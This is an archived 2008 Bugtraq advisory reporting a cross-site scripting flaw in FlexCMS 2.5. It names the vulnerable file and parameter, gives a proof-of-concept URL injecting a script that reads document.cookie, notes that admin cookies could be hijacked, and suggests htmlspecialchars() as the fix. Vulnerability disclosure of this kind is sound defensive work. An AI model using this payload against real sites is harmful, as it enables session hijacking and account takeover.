FlexCMS <= 2.5 Cross Site Scripting Vulnerability

---

• From: irancrash@xxxxxxxxx
• Date: Fri, 15 Aug 2008 04:33:35 -0600

---

----------------------------------------------------------------

Script : FlexCMS <= 2.5

Type : Cross Site Scripting Vulnerability

Alert : Low

----------------------------------------------------------------

Download From : http://www.flexcms.com/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerability :

File Name : inc-core-admin-editor-previouscolorsjs.php

Vulnerable Variable : PreviousColorsString

Send Method : GET

Register_globals : On

Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.'\');';

Address : http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=<script>alert(document.cookie)</script>

Attacker can hijack admin cookie with this vulnerability ....

Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ...


----------------------------------------------------------------

Tnx : God

HTTP://IRCRASH.COM

----------------------------------------------------------------

---

• Prev by Date: Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani
• Next by Date: [ MDVSA-2008:171 ] postfix
• Previous by thread: Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani
• Next by thread: [ MDVSA-2008:171 ] postfix
• Index(es):
  • Date
  • Thread

---

Relevant Pages [Full-disclosure] Sun Microsystems (Print) - Cross Site Scripting Vulnerability ... Sun Microsystems - Cross Site Scripting Vulnerability ... Other technologies included the Java platform, MySQL, and NFS. ... Vulnerability-Lab Team discovered a high priority Cross Site Scripting Vulnerability on different section of the java & sun vendor service. ... (Full-Disclosure) [SNS Advisory No.47] DeleGate Cross Site Scripting Vulnerability ... DeleGate Cross Site Scripting Vulnerability ... (Bugtraq) Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani ... Multiple Cross Site Scripting Vulnerabilities ... Download From: http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip ... Discovered by: Khashayar Fereidani ... Cross Site Scripting Vulnerability 1: ... (Bugtraq) [EXPL] Invision Power Board Cross Site Scripting Vulnerability ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Invision Power Board Cross Site Scripting Vulnerability ... (Securiteam) [InterN0T] Webmedia Explorer - XSS Vulnerability ... Webmedia Explorer - Cross Site Scripting Vulnerability ... Webmedia Explorer is the alternative CMS engine that reads the hard disc and generates a website realtime taking advantage of a very powerful rendering and data fetching caching system. ... -- Will be executed when a user moves his mouse over a tag. ... (Bugtraq)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2008-08